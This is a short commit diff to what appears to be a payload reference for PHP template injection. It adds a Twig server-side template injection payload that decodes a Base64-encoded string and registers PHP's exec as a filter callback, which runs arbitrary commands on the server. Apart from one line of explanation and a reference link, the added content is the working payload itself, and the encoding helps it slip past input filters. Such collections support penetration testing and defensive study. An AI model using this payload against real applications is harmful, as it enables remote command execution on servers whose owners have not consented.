Adds base64 encoded twig payload

2026-05-08 12:43:34 +02:00 · 2026-04-15 19:30:00 -04:00 · 2026-04-15 19:30:00 -04:00 · 289573def1
commit 289573def1
parent 3b069f0334
1 changed files with 6 additions and 0 deletions
--- a/Injection/PHP.md
+++ b/Injection/PHP.md
@ -201,6 +201,12 @@ The following payload, which harnesses the built-in `_context` variable, also ac

 Reference and explanation of payload can be found [yeswehack/server-side-template-injection-exploitation](https://www.yeswehack.com/learn-bug-bounty/server-side-template-injection-exploitation).

+The following allows passing of a Base64 encoded payload.
+
+```twig
+{%set a%}UTF-8{%endset%}{%set b%}BASE64{%endset%}{%set p%}base64 encoded string{%endset%}{%set p = p|convert_encoding((a), (b))%}{%set e%}exec{%endset%}{{_self.env.registerUndefinedFilterCallback(e|lower)}}{{_self.env.getFilter(p)}}
+```
+
 ---

 ## Latte